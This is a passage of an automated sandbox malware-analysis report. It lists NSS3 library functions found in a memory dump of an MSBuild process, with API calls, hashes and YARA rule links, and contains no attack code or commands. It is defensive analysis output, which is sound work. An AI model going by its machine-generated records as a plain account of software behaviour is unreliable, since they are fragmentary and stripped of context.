                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$CriticalDeleteSection
                                                                                        • String ID:
                                                                                        • API String ID: 682657753-0
                                                                                        • Opcode ID: 541c48870d85b2f597e4cecfc3e9226c14aa73a6b816b777a1f1a0159d9cf4eb
                                                                                        • Instruction ID: 2f853ee31119b62a16cc2b86d265f32e23fdbfaffea6f2e6a284ad66a51569e6
                                                                                        • Opcode Fuzzy Hash: 541c48870d85b2f597e4cecfc3e9226c14aa73a6b816b777a1f1a0159d9cf4eb
                                                                                        • Instruction Fuzzy Hash: 66F0F675601A01A7CA009F68E809917777CBF86776B10037CE52A83940D731F011C7D1
                                                                                        Function 6C616C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C616D36
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C616D2F
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C616D20
                                                                                        • database corruption, xrefs: 6C616D2A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 632333372-598938438
                                                                                        • Opcode ID: 3591a16d9418a1122940482016e6d3e3631824e450ca1b1f5b63bd351110f4ac
                                                                                        • Instruction ID: b79a5e4eebee7b2addaa67aa8477fba75f9a275f210a0f511392c787f2f67eb7
                                                                                        • Opcode Fuzzy Hash: 3591a16d9418a1122940482016e6d3e3631824e450ca1b1f5b63bd351110f4ac
                                                                                        • Instruction Fuzzy Hash: 65210235A183059BC7148E19C941B9AB7F2EF81309F14852CD849DBF51E770F9488B9A
                                                                                        Function 6C74CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C74CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C74CC7B), ref: 6C74CD7A
                                                                                          • Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CD8E
                                                                                          • Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CDA5
                                                                                          • Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CDB8
                                                                                        • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C74CCB5
                                                                                        • memcpy.VCRUNTIME140(6C7E14F4,6C7E02AC,00000090), ref: 6C74CCD3
                                                                                        • memcpy.VCRUNTIME140(6C7E1588,6C7E02AC,00000090), ref: 6C74CD2B
                                                                                          • Part of subcall function 6C669AC0: socket.WSOCK32(?,00000017,6C6699BE), ref: 6C669AE6
                                                                                          • Part of subcall function 6C669AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6699BE), ref: 6C669AFC
                                                                                          • Part of subcall function 6C670590: closesocket.WSOCK32(6C669A8F,?,?,6C669A8F,00000000), ref: 6C670597
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                        • String ID: Ipv6_to_Ipv4 layer
                                                                                        • API String ID: 1231378898-412307543
                                                                                        • Opcode ID: 2de7e68267e7a792c02033b71a4e56d769e61a1b5bbd94a415f2be7806b2019b
                                                                                        • Instruction ID: 3bcf0d088abaf35cbdb54527c5b19bdbe7fc9850e6a007e8a9399d2e18e41fea
                                                                                        • Opcode Fuzzy Hash: 2de7e68267e7a792c02033b71a4e56d769e61a1b5bbd94a415f2be7806b2019b
                                                                                        • Instruction Fuzzy Hash: B71193F3B012409FDB809F6AAA4BB563AB8934F218F145439E41ACBB53E771C444CBD6
                                                                                        Function 6C798530 Relevance: 6.1, APIs: 4, Instructions: 127threadnetworkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_CallOnce.NSS3(6C7E14E4,6C74CC70), ref: 6C798569
                                                                                        • gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6C7985AD
                                                                                        • GetLastError.KERNEL32(?,00000004,00000002), ref: 6C7985B6
                                                                                        • PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6C7985C6
                                                                                          • Part of subcall function 6C670F00: PR_GetPageSize.NSS3(6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F1B
                                                                                          • Part of subcall function 6C670F00: PR_NewLogModule.NSS3(clock,6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
                                                                                        • String ID:
                                                                                        • API String ID: 4254312643-0
                                                                                        • Opcode ID: 3ddd1d396dc41aebdcc30267735d8d170ab8e0cb83a8657d4325234e0ae06693
                                                                                        • Instruction ID: 673417687466e779935b9e7bab5c5d4cd99757a6b0fcfc31c65bf863e800fb97
                                                                                        • Opcode Fuzzy Hash: 3ddd1d396dc41aebdcc30267735d8d170ab8e0cb83a8657d4325234e0ae06693
                                                                                        • Instruction Fuzzy Hash: E44117B0A0830AAFE7148A36EA45755B7B4EB4532CF08473BC92587EC2D7749D88CBD1
                                                                                        Function 6C6D0420 Relevance: 6.1, APIs: 4, Instructions: 117memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(00000000,?,6C6BC97F,?,?,?), ref: 6C6D04BF
                                                                                        • TlsGetValue.KERNEL32(00000000,?,6C6BC97F,?,?,?), ref: 6C6D04F4
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6C6BC97F,?,?,?), ref: 6C6D050D
                                                                                        • PR_Unlock.NSS3(?,?,?,?,6C6BC97F,?,?,?), ref: 6C6D0556
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc_CriticalEnterSectionUnlockUtilValue
                                                                                        • String ID:
                                                                                        • API String ID: 349578545-0
                                                                                        • Opcode ID: ceae44856b1ec7a770b8fe908dc9742e055f2240bac9a2776d8c0c455bc7c273
                                                                                        • Instruction ID: c14347d798cec434ea91734d32988865d5bb4761e6cb61b66e2baed846922311
                                                                                        • Opcode Fuzzy Hash: ceae44856b1ec7a770b8fe908dc9742e055f2240bac9a2776d8c0c455bc7c273
                                                                                        • Instruction Fuzzy Hash: FE4158B4A11642CFDB04DF29C584669BBF0BF48318F26856DDC998BB11EB30F891CB84
                                                                                        Function 6C686C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C686C8D
                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C686CA9
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C686CC0
                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C7A8FE0), ref: 6C686CFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                        • String ID:
                                                                                        • API String ID: 2370200771-0
                                                                                        • Opcode ID: 14cc699a4213948a44442e99d4e271eb9eb346c5a9e2d08d8a4e879c4aa279e1
                                                                                        • Instruction ID: 946ec0e014d1ac349b3aa923b32c18b9cb19dc5612b9d34e7aa8e89c538617cb
                                                                                        • Opcode Fuzzy Hash: 14cc699a4213948a44442e99d4e271eb9eb346c5a9e2d08d8a4e879c4aa279e1
                                                                                        • Instruction Fuzzy Hash: F0317CB1A022169BEB08DF65C891ABFBBF5EF49248B10442DD905EB740EB31D905CBA4
                                                                                        Function 6C6E8530 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_FindOID_Util.NSS3(?,?,6C6E72EC), ref: 6C6E855A
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825
                                                                                        • PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6C6E72EC), ref: 6C6E859E
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C6E72EC), ref: 6C6E85B8
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,6C6E72EC), ref: 6C6E8600
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
                                                                                        • String ID:
                                                                                        • API String ID: 1727503455-0
                                                                                        • Opcode ID: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
                                                                                        • Instruction ID: ceb29f521e66f56d14f38c46de5df2252ae886c4a80765d5b100e187f2fa680b
                                                                                        • Opcode Fuzzy Hash: c3976de85504193724a61ee596be12a747b852d478c2b9224f3d669c07c31240
                                                                                        • Instruction Fuzzy Hash: 66213831A062014BE7408F2DDC40B6B72A9AF8D31CF65412BD855D77A0EF31D805C799
                                                                                        Function 6C6704D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileInformationByHandle.KERNEL32(?,?), ref: 6C6704F1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C67053B
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C670558
                                                                                        • GetLastError.KERNEL32 ref: 6C67057A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
                                                                                        • String ID:
                                                                                        • API String ID: 3051374878-0
                                                                                        • Opcode ID: fc013631943d9a5fe1ab7b9833bb3becdf39dc5b0a8457adc4265cdc8411f081
                                                                                        • Instruction ID: 49d74535437738a3bae7a46422804c4819ff81b6b43f0b69d05b2722fff8c5d8
                                                                                        • Opcode Fuzzy Hash: fc013631943d9a5fe1ab7b9833bb3becdf39dc5b0a8457adc4265cdc8411f081
                                                                                        • Instruction Fuzzy Hash: F6216271B002189FDB08DF68DD98A9EB7B8FF49308B108129E809DB351D731ED05CBA0
                                                                                        Function 6C6F2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6C6F2E08
                                                                                          • Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
                                                                                          • Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
                                                                                          • Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D
                                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6C6F2E1C
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C6F2E3B
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6F2E95
                                                                                          • Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
                                                                                          • Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
                                                                                          • Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
                                                                                          • Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
                                                                                          • Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
                                                                                          • Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
                                                                                          • Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                        • String ID:
                                                                                        • API String ID: 1441289343-0
                                                                                        • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                        • Instruction ID: 24cfae1e91e605b96fa02d5850de40353ccc0cb371ff3e698b0162e7bbe16999
                                                                                        • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                        • Instruction Fuzzy Hash: 122168B1D053804BE700CF509C44BAA3765AF9630CF210269DD285B702F7B1E69AC7AA
                                                                                        Function 6C6AACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CERT_NewCertList.NSS3 ref: 6C6AACC2
                                                                                          • Part of subcall function 6C682F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C682F0A
                                                                                          • Part of subcall function 6C682F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C682F1D
                                                                                          • Part of subcall function 6C682AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C680A1B,00000000), ref: 6C682AF0
                                                                                          • Part of subcall function 6C682AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C682B11
                                                                                        • CERT_DestroyCertList.NSS3(00000000), ref: 6C6AAD5E
                                                                                          • Part of subcall function 6C6C57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C68B41E,00000000,00000000,?,00000000,?,6C68B41E,00000000,00000000,00000001,?), ref: 6C6C57E0
                                                                                          • Part of subcall function 6C6C57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C6C5843
                                                                                        • CERT_DestroyCertList.NSS3(?), ref: 6C6AAD36
                                                                                          • Part of subcall function 6C682F50: CERT_DestroyCertificate.NSS3(?), ref: 6C682F65
                                                                                          • Part of subcall function 6C682F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C682F83
                                                                                        • free.MOZGLUE(?), ref: 6C6AAD4F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                        • String ID:
                                                                                        • API String ID: 132756963-0
                                                                                        • Opcode ID: 0efbb8457ca2d32c8c5763be991d5a685945134a7909cc46123d2d37323aadbf
                                                                                        • Instruction ID: fa764de69724c3a8e952a53262227afe52f989dfc4fad52e8c3ca96ad98f6c58
                                                                                        • Opcode Fuzzy Hash: 0efbb8457ca2d32c8c5763be991d5a685945134a7909cc46123d2d37323aadbf
                                                                                        • Instruction Fuzzy Hash: C421C3B1D012188BEB10DFA4D9055EEB7F4EF06208F05406AD845BB701FB31AE5ACBB9
                                                                                        Function 6C6C24E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C24FF
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C250F
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C253C
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C2554
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                        • String ID:
                                                                                        • API String ID: 284873373-0
                                                                                        • Opcode ID: 99531d802e1f34d33dc2b0297de4b18c86279f3c3b303006e190008793d54a21
                                                                                        • Instruction ID: 2a0d71269dcb4d5b08f25e5286cd6888aca4b75b05a9dd20ede8995113f34f2a
                                                                                        • Opcode Fuzzy Hash: 99531d802e1f34d33dc2b0297de4b18c86279f3c3b303006e190008793d54a21
                                                                                        • Instruction Fuzzy Hash: 6D110872E00108ABDB00AF68DC499AB7B78EF0A329F954174EC0897311EB31ED55C7E2
                                                                                        Function 6C6DECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C6DF0AD,6C6DF150,?,6C6DF150,?,?,?), ref: 6C6DECBA
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C6DECD1
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C6DED02
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E116E
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C6DED5A
                                                                                        Memory Dump Source
